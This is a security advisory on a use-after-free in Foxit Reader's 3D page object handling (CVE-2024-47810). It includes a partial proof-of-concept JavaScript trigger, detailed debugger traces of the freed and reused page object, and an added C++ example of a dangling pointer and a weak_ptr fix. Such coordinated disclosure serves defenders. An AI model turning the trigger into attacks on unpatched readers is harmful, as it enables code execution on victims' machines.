Talos Vulnerability Report

TALOS-2024-2094

Foxit Reader 3D Page Object Use-After-Free Vulnerability

December 18, 2024
CVE Number

CVE-2024-47810

SUMMARY

A use-after-free vulnerability exists in the way Foxit Reader 2024.3.0.26795 handles a 3D page object. Specially crafted JavaScript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site while the browser plugin extension is enabled.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Foxit Reader 2024.3.0.26795

PRODUCT URLS

Foxit Reader - https://www.foxitsoftware.com/pdf-reader/

CVSSv3 SCORE

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-416 - Use After Free

DETAILS

Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.

JavaScript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists a use-after-free vulnerability in the way Foxit Reader handles a page object referenced from within a 3D object. This can be illustrated by the following proof-of-concept code:

function main() { 
    app.activeDocs[0].layout = "TwoColumnRight"; 
    app.activeDocs[0]["zoom"] = "AAA";  
    app.activeDocs[0].zoomType = zoomtype.fitW; 
    app.activeDocs[0].pageNum = 4;
    app.activeDocs[0].getField('Text Field0').setFocus(); 
}

[...]

function page_delete() {
    app.activeDocs[0].deletePages(4);
    app.activeDocs[0].deletePages();
    app.activeDocs[0].addField("AAA", "radiobutton", 0, [107374182,102,5] ) ;
}

In the above code, the page_delete method is invoked when the page number is set to 4 in the main() function. The page_delete function calls deletePages(), which in turn frees all objects associated with the page. The use-after-free vulnerability occurs because the page object is freed but the reference to it held inside the 3D object is not cleared. Later, this freed object is used without any validation. This behavior can be observed in the debugger (with PageHeap enabled):

0:000> g
eax=0058f5d8 ebx=10098d8c ecx=00000002 edx=00000003 esi=190b8368 edi=ffffffff
eip=6b97e26e esp=0058f5c0 ebp=0058f630 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
U3DBrowser!PlugInMain+0x1bf0e:
6b97e26e 8945dc          mov     dword ptr [ebp-24h],eax ss:002b:0058f60c=10098e80
0:000> p
eax=0058f5d8 ebx=10098d8c ecx=00000002 edx=00000003 esi=190b8368 edi=ffffffff
eip=6b97e271 esp=0058f5c0 ebp=0058f630 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
U3DBrowser!PlugInMain+0x1bf11:
6b97e271 6a64            push    64h
0:000> p
eax=0058f5d8 ebx=10098d8c ecx=00000002 edx=00000003 esi=190b8368 edi=ffffffff
eip=6b97e273 esp=0058f5bc ebp=0058f630 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
U3DBrowser!PlugInMain+0x1bf13:
6b97e273 c745fc03000000  mov     dword ptr [ebp-4],3  ss:002b:0058f62c=ffffffff
0:000> p
eax=0058f5d8 ebx=10098d8c ecx=00000002 edx=00000003 esi=190b8368 edi=ffffffff
eip=6b97e27a esp=0058f5bc ebp=0058f630 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
U3DBrowser!PlugInMain+0x1bf1a:
6b97e27a ff157cac9e6b    call    dword ptr [U3DBrowser!PlugInMain+0x8891c (6b9eac7c)] ds:002b:6b9eac7c={mfc140u!operator new (6fb6ee10)} ; <-------- (1)
0:000> p
eax=13a54730 ebx=10098d8c ecx=00000064 edx=00000003 esi=190b8368 edi=ffffffff
eip=6b97e280 esp=0058f5bc ebp=0058f630 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
U3DBrowser!PlugInMain+0x1bf20:
6b97e280 8bf0            mov     esi,eax
0:000> dd eax                            ; <-------------------- (2)
13a54730  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
13a54740  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
13a54750  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
13a54760  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
13a54770  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
13a54780  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
13a54790  e0e0e0e0 a0a0a0a0 a0a0a0a0 f0f0f0f0
13a547a0  00000000 00000000 e01887ab 0040fda6

When the 3D image of the document is loaded, a method is called at (1) to create a CArtworkAnnot object of size 0x64 (the push 64h immediately before the call is the allocation size). The contents of the freshly allocated 3D object can be observed at (2).

0:000> p
eax=13a54730 ebx=10098d8c ecx=13a5473c edx=00000003 esi=13a54730 edi=ffffffff
eip=6b97e2b0 esp=0058f5b8 ebp=0058f630 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
U3DBrowser!PlugInMain+0x1bf50:
6b97e2b0 ff75e4          push    dword ptr [ebp-1Ch]  ss:002b:0058f614=1909bb18
0:000> p
eax=13a54730 ebx=10098d8c ecx=13a5473c edx=00000003 esi=13a54730 edi=ffffffff
eip=6b97e2b3 esp=0058f5b4 ebp=0058f630 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
U3DBrowser!PlugInMain+0x1bf53:
6b97e2b3 ff75dc          push    dword ptr [ebp-24h]  ss:002b:0058f60c=0058f5d8
0:000> p
eax=13a54730 ebx=10098d8c ecx=13a5473c edx=00000003 esi=13a54730 edi=ffffffff
eip=6b97e2b6 esp=0058f5b0 ebp=0058f630 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
U3DBrowser!PlugInMain+0x1bf56:
6b97e2b6 e885e3ffff      call    U3DBrowser!PlugInMain+0x1a2e0 (6b97c640)  ; <-------- (3)
0:000> dd eax                            ; <-------------------- (4)
13a54730  6b9ec084 00000001 00000001 e0e0e0e0
13a54740  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
13a54750  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
13a54760  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
13a54770  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
13a54780  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
13a54790  e0e0e0e0 a0a0a0a0 a0a0a0a0 f0f0f0f0
13a547a0  00000000 00000000 e01887ab 0040fda6
0:000> p
eax=13a5473c ebx=10098d8c ecx=fff7993f edx=0c55c950 esi=13a54730 edi=ffffffff
eip=6b97e2bb esp=0058f5c0 ebp=0058f630 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
U3DBrowser!PlugInMain+0x1bf5b:
6b97e2bb eb02            jmp     U3DBrowser!PlugInMain+0x1bf5f (6b97e2bf)
0:000> dd eax                             ; <-------------------- (5)
13a5473c  6b9ebfe4 00000000 00000000 00000001
13a5474c  1909bb18 1909d950 190b8368 00000000
13a5475c  e0e0e000 10098d8c 10098d80 00000000
13a5476c  00000000 00000002 00000002 00000000
13a5477c  00000001 00000000 00000120 000000d8

At (3), a method is called to initialize the 3D object. The contents of the 3D buffer are examined at (4) and (5), showing the values before and after initialization. At offset 0x10 of the initialized buffer (address 0x13a5474c) it holds a reference to a page object, 0x1909bb18. This page object is freed when the deletePages method is called.

0:000> g
eax=0058e768 ebx=0058e7d4 ecx=0306eef0 edx=00000002 esi=136f96f8 edi=1583b540
eip=03413e79 esp=0058e740 ebp=0058e780 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
FoxitPDFReader!FXJSE_GetClass+0x269:
03413e79 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0x11ffcd0 (0306eef0)}
0:000> g
ModLoad: 6aa60000 6adc5000   C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\plugins\PDFAccessibility.fpi
eax=0058e768 ebx=0058e7d4 ecx=0306eef0 edx=00000002 esi=15a60188 edi=13da3cc0
eip=03413e79 esp=0058e740 ebp=0058e780 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
FoxitPDFReader!FXJSE_GetClass+0x269:
03413e79 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0x11ffcd0 (0306eef0)}  ; <--------------- (6)

[...]

0:000>
eax=00000001 ebx=15e40460 ecx=6f99f197 edx=00000001 esi=1909bb18 edi=15e40460
eip=00c0a5bb esp=0058e588 ebp=0058e5b0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb61b: 
00c0a5bb 56              push    esi                             ; <--------------- (7)
0:000> p
eax=00000001 ebx=15e40460 ecx=6f99f197 edx=00000001 esi=1909bb18 edi=15e40460
eip=00c0a5bc esp=0058e584 ebp=0058e5b0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb61c:
00c0a5bc e89fcb8201      call    FoxitPDFReader!safe_vsnprintf+0x5c7f40 (02437160)  ; <--------------- (8)
0:000> dd esi                                    ; <--------------- (9)
1909bb18  19092e30 00000000 0c566458 19092e60
1909bb28  19092e60 00000000 44190000 00000000
1909bb38  44460000 00000000 44190000 00000000
1909bb48  44460000 00000300 00000000 00000000
1909bb58  15e93228 00000000 00000000 00000000
1909bb68  00000000 00000000 00000000 00000000
1909bb78  00000080 00000000 00000000 00000100
1909bb88  00000000 00000000 00000001 ffffffff
0:000> p
eax=00000000 ebx=15e40460 ecx=6f99f16b edx=002d6000 esi=1909bb18 edi=15e40460
eip=00c0a5c1 esp=0058e584 ebp=0058e5b0 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000212
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb621:
00c0a5c1 83c404          add     esp,4
0:000> dd esi                                     ; <--------------- (10)
1909bb18  00000000 00000000 0c566458 19092e60
1909bb28  19092e60 00000000 44190000 00000000
1909bb38  44460000 00000000 44190000 00000000
1909bb48  44460000 00000300 00000000 00000000
1909bb58  15e93228 00000000 00000000 00000000
1909bb68  00000000 00000000 00000000 00000000
1909bb78  00000080 00000000 00000000 00000100
1909bb88  00000000 00000000 00000001 ffffffff

0:000> KB L6
 # ChildEBP RetAddr      Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0058e5b0 00bead8d     6f99f1cf 15b03480 15b034b4 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb621
01 0058e5d8 00bd028a     136edf48 6f99f21b 10cf3144 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xcbded
02 0058e60c 00bd7cf6     6f99f267 1908f320 00000001 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xb12ea
03 0058e670 00bd7fbd     15b03480 00000000 0058e68c FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xb8d56
04 0058e680 013ed0d1     0058e6a8 0058e6e4 030a69ac FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xb901d
05 0058e68c 030a69ac     0058e6a8 6f99f2f3 13da3cc0 FoxitPDFReader!CryptUIWizExport+0x30c51

At (6), the javascript::CFXJS_Document::deletePages_static method associated with the JavaScript API deletePages() is called. This subsequently calls the destructor of the CReader_Page object. The destructor invokes operator_delete at (8) on the vulnerable object. At (7), the argument for operator_delete, the page object address 0x1909bb18 held in the esi register, is pushed onto the stack. The contents of the vulnerable object are examined at (9) and (10), showing the values before and after operator_delete is called. Note that the Foxit application uses a custom allocator, so PageHeap is not able to mark the freed buffer as inaccessible.

0:000> g
eax=10cf3130 ebx=0058f474 ecx=100bdd90 edx=0c55cec0 esi=13780504 edi=75516140
eip=6b9730be esp=0058f3c4 ebp=0058f468 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
U3DBrowser!PlugInMain+0x10d5e:
6b9730be 8b55dc          mov     edx,dword ptr [ebp-24h] ss:002b:0058f444=13a5473c
0:000> p
eax=10cf3130 ebx=0058f474 ecx=100bdd90 edx=13a5473c esi=13780504 edi=75516140
eip=6b9730c1 esp=0058f3c4 ebp=0058f468 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
U3DBrowser!PlugInMain+0x10d61:
6b9730c1 8bc8            mov     ecx,eax
0:000> p
eax=10cf3130 ebx=0058f474 ecx=10cf3130 edx=13a5473c esi=13780504 edi=75516140
eip=6b9730c3 esp=0058f3c4 ebp=0058f468 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
U3DBrowser!PlugInMain+0x10d63:
6b9730c3 ff7214          push    dword ptr [edx+14h]  ds:002b:13a54750=1909d950
0:000> p
eax=10cf3130 ebx=0058f474 ecx=10cf3130 edx=13a5473c esi=13780504 edi=75516140
eip=6b9730c6 esp=0058f3c0 ebp=0058f468 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
U3DBrowser!PlugInMain+0x10d66:
6b9730c6 8b5210          mov     edx,dword ptr [edx+10h] ds:002b:13a5474c=1909bb18    ; <--------------- (11)
0:000> p
eax=10cf3130 ebx=0058f474 ecx=10cf3130 edx=1909bb18 esi=13780504 edi=75516140
eip=6b9730c9 esp=0058f3c0 ebp=0058f468 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
U3DBrowser!PlugInMain+0x10d69:
6b9730c9 e8d2d60100      call    U3DBrowser!PlugInMain+0x2e440 (6b9907a0)  ; <--------------- (12)
0:000> p
0:000> dd edx
1909bb18  2e300a71 30203537 2035372e 35372e30
1909bb28  0a677220 38363335 36333037 20313520
1909bb38  33350a6d 30373836 37203633 31362e38
1909bb48  33352034 30373836 31203036 35203130
1909bb58  37383633 20383830 20313031 33350a63
1909bb68  31373836 31203631 35203130 37383633
1909bb78  20303431 362e3837 35203431 37383633
1909bb88  20303431 63203135 3633350a 34313738

At (11), the CArtworkAnnot object still contains a reference to the freed page object. This reference was neither cleared nor updated in the 3D object after the delete operation. Note that the freed buffer at 0x1909bb18 has since been reassigned to another object (its contents now look like PDF content-stream text). The stale pointer is passed as the this pointer to a method at (12). The crash occurs when that this pointer is dereferenced without any validation.

0:000> p
(1c34.1c2c): Access violation - code c0000005 (!!! second chance !!!)
eax=2e300a71 ebx=1909bb18 ecx=100b6248 edx=0c558e30 esi=10cf3130 edi=75516140
eip=01ee5696 esp=0058f3a0 ebp=0058f3a0 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010212
FoxitPDFReader!safe_vsnprintf+0x76476: 
01ee5696 8b4008          mov     eax,dword ptr [eax+8] ds:002b:2e300a79=????????  <------------ (13)
0:000> dd eax
2e300a71  ???????? ???????? ???????? ????????
2e300a81  ???????? ???????? ???????? ????????
2e300a91  ???????? ???????? ???????? ????????
2e300aa1  ???????? ???????? ???????? ????????
2e300ab1  ???????? ???????? ???????? ????????
2e300ac1  ???????? ???????? ???????? ????????
2e300ad1  ???????? ???????? ???????? ????????
2e300ae1  ???????? ???????? ???????? ????????
0:000> dd 1909bb18
1909bb18  2e300a71 30203537 2035372e 35372e30
1909bb28  0a677220 38363335 36333037 20313520
1909bb38  33350a6d 30373836 37203633 31362e38
1909bb48  33352034 30373836 31203036 35203130
1909bb58  37383633 20383830 20313031 33350a63
1909bb68  31373836 31203631 35203130 37383633
1909bb78  20303431 362e3837 35203431 37383633
1909bb88  20303431 63203135 3633350a 34313738

0:000> u
FoxitPDFReader!safe_vsnprintf+0x76476:
01ee5696 8b4008          mov     eax,dword ptr [eax+8]
01ee5699 5d              pop     ebp
01ee569a c3              ret

0:000> kb
 # ChildEBP RetAddr      Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0058f3a0 6b990820     2e300a71 13780504 0058f474 FoxitPDFReader!safe_vsnprintf+0x76476
01 0058f3b8 6b9730ce     1909d950 fff798ff 75516140 U3DBrowser!PlugInMain+0x2e4c0
02 0058f468 6b9ce06c     0058f530 00000000 6b9ce06c U3DBrowser!PlugInMain+0x10d6e
03 0058f530 6b9cdcf5     fff799cf ffffffff 1009b3d8 U3DBrowser!PlugInMain+0x6bd0c
04 0058f558 6b9c49e8     13780504 137804f8 10098d8c U3DBrowser!PlugInMain+0x6b995
05 0058f570 6b97ec71     fff79927 ffffffff 13a54730 U3DBrowser!PlugInMain+0x62688
06 0058f5b0 6b97e3e7     13780504 137804f8 fff79aa7 U3DBrowser!PlugInMain+0x1c911
07 0058f630 6b9d3d1b     10ddcda8 1373d788 10cf3130 U3DBrowser!PlugInMain+0x1c087
08 0058f674 6b9bd6c5     10cf3130 10ddcda8 1373d788 U3DBrowser!PlugInMain+0x719bb
09 0058f6b0 6fb38b00     1185d3a8 1373d788 7f186e97 U3DBrowser!PlugInMain+0x5b365
0a 0058f780 6fbd1a7d     00000bc8 1185d3a8 1373d788 mfc140u!CWnd::OnWndMsg+0x795 [f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp @ 2695] 
0b 0058f7a4 6fbd13a2     00000bc8 1185d3a8 1373d788 mfc140u!CWnd::WindowProc+0x2c [f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp @ 2099] 
0c 0058f81c 6fb3861b     6ba0a020 000704b6 00000bc8 mfc140u!AfxCallWndProc+0xb8 [f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp @ 268] 
0d 0058f83c 6fb385ba     000704b6 00000bc8 1185d3a8 mfc140u!AfxWndProc+0x46 [f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp @ 416] 
0e (Inline) --------     -------- -------- -------- mfc140u!AFX_MAINTAIN_STATE2::{dtor} [f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxstate.cpp @ 99] 
0f 0058f878 7552171b     000704b6 00000bc8 1185d3a8 mfc140u!AfxWndProcBase+0x34 [f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxstate.cpp @ 299] 
10 0058f8a4 75517e8a     6fb38580 000704b6 00000bc8 USER32!_InternalCallWinProc+0x2b
11 0058f98c 75517646     6fb38580 00000000 00000bc8 USER32!UserCallWinProcCheckWow+0x33a
12 0058f9c4 75515e6b     00000bc8 1185d3a8 1373d788 USER32!CallWindowProcAorW+0x7f
13 0058f9dc 0441cff7     6fb38580 000704b6 00000bc8 USER32!CallWindowProcW+0x1b
14 0058fa60 7552171b     000704b6 00000bc8 1185d3a8 FoxitPDFReader!AUILib::SkinManagerColor::SetDefaultColor+0x5f0ea7
15 0058fa8c 75517e8a     0441ceda 000704b6 00000bc8 USER32!_InternalCallWinProc+0x2b
16 0058fb74 755167c1     0441ceda 00000000 00000bc8 USER32!UserCallWinProcCheckWow+0x33a
17 0058fbf0 755162e0     00000ac8 0058fc18 00d034e4 USER32!DispatchMessageWorker+0x4d1
18 0058fbfc 00d034e4     0c5e9b48 0c5e9b48 05f69798 USER32!DispatchMessageW+0x10
19 0058fc18 00d035a3     05f69798 00d03510 ffffffff FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1e4544
1a 0058fc38 0484a70a     00000000 05f956ac 002d3000 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1e4603
1b 0058fc50 045ff41a     00910000 00000000 0c5853c4 FoxitPDFReader!AUILib::SkinManagerColor::SetDefaultColor+0xa1e5ba
1c 0058fc9c 74fbfcc9     002d3000 74fbfcb0 0058fd08 FoxitPDFReader!AUILib::SkinManagerColor::SetDefaultColor+0x7d32ca
1d 0058fcac 770a809e     002d3000 e4cdb485 00000000 KERNEL32!BaseThreadInitThunk+0x19
1e 0058fd08 770a806e     ffffffff 770c910a 00000000 ntdll!__RtlUserThreadStart+0x2f
1f 0058fd18 00000000     045ff4e9 002d3000 00000000 ntdll!_RtlUserThreadStart+0x1b

The crash occurs at (13) when the virtual table of the this pointer is dereferenced. Depending on the memory layout of the process, it may be possible to perform arbitrary read and write operations, which could potentially be exploited to achieve arbitrary code execution.
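The root cause described above, and at (11) through (13), is a non-owning reference (the page pointer inside the 3D annotation) that outlives the object it points to. The following C++ is an added illustration written for this report, not Foxit code: a page owned by a document and referenced from an artwork annotation. The raw-pointer form shows the dangling pattern; the hardened form holds a std::weak_ptr so that deleting the page makes the annotation's reference expire and any later use is refused rather than dereferenced. All type and function names (Page, Document, ArtworkAnnot, DanglingArtworkAnnot, demo) are hypothetical.

```cpp
// Added illustration (not Foxit code): a page object shared between a
// document and a 3D annotation, modelled with std::shared_ptr/std::weak_ptr
// so that deleting the page invalidates the annotation's reference instead of
// leaving a dangling pointer. All names here are hypothetical.
#include <cstddef>
#include <memory>
#include <string>
#include <vector>

struct Page {
    int number;            // 0-based page index, like app.activeDocs[0].pageNum
    std::string content;   // stand-in for the real page data
};

// The problematic pattern from the advisory, written out in its raw form:
// the annotation keeps a plain pointer that nothing resets when the page is
// destroyed, so any later use reads freed (and possibly reused) memory.
// It is shown for contrast only and is never dereferenced in this program.
struct DanglingArtworkAnnot {
    Page* page = nullptr;  // not owned, never cleared after the page is freed
};

// Hardened form: the annotation keeps a weak reference. It can only reach the
// page through lock(), which yields an empty pointer once the page is gone.
class ArtworkAnnot {
public:
    explicit ArtworkAnnot(const std::shared_ptr<Page>& p) : page_(p) {}

    // Returns false instead of touching freed memory when the page was deleted.
    bool render(std::string& out) const {
        std::shared_ptr<Page> p = page_.lock();
        if (!p) {
            out.clear();
            return false;
        }
        out = "3D artwork on page " + std::to_string(p->number) + ": " + p->content;
        return true;
    }

    bool pageAlive() const { return !page_.expired(); }

private:
    std::weak_ptr<Page> page_;
};

class Document {
public:
    explicit Document(std::size_t page_count) {
        for (std::size_t i = 0; i < page_count; ++i)
            pages_.push_back(std::make_shared<Page>(
                Page{static_cast<int>(i), "page " + std::to_string(i)}));
    }

    std::size_t pageCount() const { return pages_.size(); }

    std::shared_ptr<Page> page(std::size_t idx) const { return pages_.at(idx); }

    // Mirrors the JavaScript deletePages(n): the document drops its owning
    // reference; any annotation still pointing at the page sees it expire.
    bool deletePages(std::size_t idx) {
        if (idx >= pages_.size()) return false;
        pages_.erase(pages_.begin() + static_cast<std::ptrdiff_t>(idx));
        return true;
    }

private:
    std::vector<std::shared_ptr<Page>> pages_;
};

// Drives the sequence from the proof of concept: attach artwork to page 4,
// delete page 4, then try to use the artwork. Returns true when the annotation
// detected the deletion and refused to dereference the stale reference.
bool demo() {
    Document doc(6);
    ArtworkAnnot annot(doc.page(4));
    std::string out;
    bool before = annot.render(out);   // true: page 4 is still alive
    doc.deletePages(4);
    bool after = annot.render(out);    // false: reference expired, no memory touched
    return before && !after && !annot.pageAlive();
}

int main() { return demo() ? 0 : 1; }
```

The design point is ownership: the document is the sole owner of its pages, and every other holder of a page reference must be able to observe that the page is gone. A weak reference gives that for free; an equivalent fix with raw pointers would require deletePages to walk every annotation and null out its back-reference before the page is released, which is exactly the step the advisory reports as missing.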

TIMELINE

2024-10-24 - Vendor Disclosure
2024-12-17 - Vendor Patch Release
2024-12-18 - Public Release

Credit

Discovered by KPC of Cisco Talos.